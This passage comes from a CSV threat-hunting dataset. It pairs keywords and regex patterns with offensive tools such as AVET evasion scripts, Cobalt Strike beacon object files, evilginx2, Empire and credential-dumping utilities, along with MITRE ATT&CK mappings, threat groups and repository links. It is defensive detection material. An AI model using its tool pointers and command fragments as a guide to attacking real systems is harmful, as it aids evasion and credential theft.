- TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*build.ps1 -profiles * -commands * -compressed*",".{0,1000}build\.ps1\s\-profiles\s.{0,1000}\s\-commands\s.{0,1000}\s\-compressed.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*build/breg.cna*",".{0,1000}build\/breg\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*build/evilginx*",".{0,1000}build\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*build_40xshikata_revhttpsunstaged_win32.sh*",".{0,1000}build_40xshikata_revhttpsunstaged_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_50xshikata_quiet_revhttps_win32.sh*",".{0,1000}build_50xshikata_quiet_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_50xshikata_revhttps_win32.sh*",".{0,1000}build_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_asciimsf_fromcmd_revhttps_win32.sh*",".{0,1000}build_asciimsf_fromcmd_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_asciimsf_revhttps_win32.sh*",".{0,1000}build_asciimsf_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_avetenc_dynamicfromfile_revhttps_win32.sh*",".{0,1000}build_avetenc_dynamicfromfile_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_avetenc_fopen_revhttps_win32.sh*",".{0,1000}build_avetenc_fopen_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_avetenc_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_avetenc_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_c_shellcode*",".{0,1000}build_c_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*build_c_xor_ipv6(*",".{0,1000}build_c_xor_ipv6\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*build_c_xor_ipv6_dll(*",".{0,1000}build_c_xor_ipv6_dll\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*build_calcfromcmd_50xshikata_revhttps_win32.sh*",".{0,1000}build_calcfromcmd_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_calcfrompowersh_50xshikata_revhttps_win32.sh*",".{0,1000}build_calcfrompowersh_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_checkdomain_rc4_mimikatz.sh*",".{0,1000}build_checkdomain_rc4_mimikatz\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_disablewindefpsh_xorfromcmd_revhttps_win64.sh*",".{0,1000}build_disablewindefpsh_xorfromcmd_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_dkmc_downloadexecshc_revhttps_win32.sh*",".{0,1000}build_dkmc_downloadexecshc_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_downloadbitsadmin_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_downloadbitsadmin_revhttps_win32.sh*",".{0,1000}build_downloadbitsadmin_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_downloadcertutil_revhttps_win32.sh*",".{0,1000}build_downloadcertutil_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_downloadcurl_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_downloadcurl_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_golang_xor_ipv6(*",".{0,1000}build_golang_xor_ipv6\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*build_onionpipe.bash*",".{0,1000}build_onionpipe\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*build_sleep_rc4_mimikatz.sh*",".{0,1000}build_sleep_rc4_mimikatz\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_svc_20xshikata_bindtcp_win32.sh*",".{0,1000}build_svc_20xshikata_bindtcp_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_tor_darwin.bash*",".{0,1000}build_tor_darwin\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*build_tor_debian.bash*",".{0,1000}build_tor_debian\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*BuildBOFs.exe*",".{0,1000}BuildBOFs\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","24","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*BuildBOFs.sln*",".{0,1000}BuildBOFs\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","24","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*builder/linpeas_parts/*",".{0,1000}builder\/linpeas_parts\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*Building ABPTTS configuration *",".{0,1000}Building\sABPTTS\sconfiguration\s.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*Building Evil Lsass Twin*",".{0,1000}Building\sEvil\sLsass\sTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*Building SYSTEM impersonation*",".{0,1000}Building\sSYSTEM\simpersonation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-MS16032.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*BulletsPassView.exe*",".{0,1000}BulletsPassView\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView.zip*",".{0,1000}BulletsPassView\.zip.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView_setup.exe*",".{0,1000}BulletsPassView_setup\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView_x64.exe*",".{0,1000}BulletsPassView_x64\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bully wlan1mon -b * -c 9 -S -F -B -v 3*",".{0,1000}bully\swlan1mon\s\-b\s.{0,1000}\s\-c\s9\s\-S\s\-F\s\-B\s\-v\s3.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bunny.deb.parrot.sh/*",".{0,1000}bunny\.deb\.parrot\.sh\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bupload_raw*.dll*",".{0,1000}bupload_raw.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*burnett_top_1024.txt*",".{0,1000}burnett_top_1024\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Burp Suite*",".{0,1000}Burp\sSuite.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation 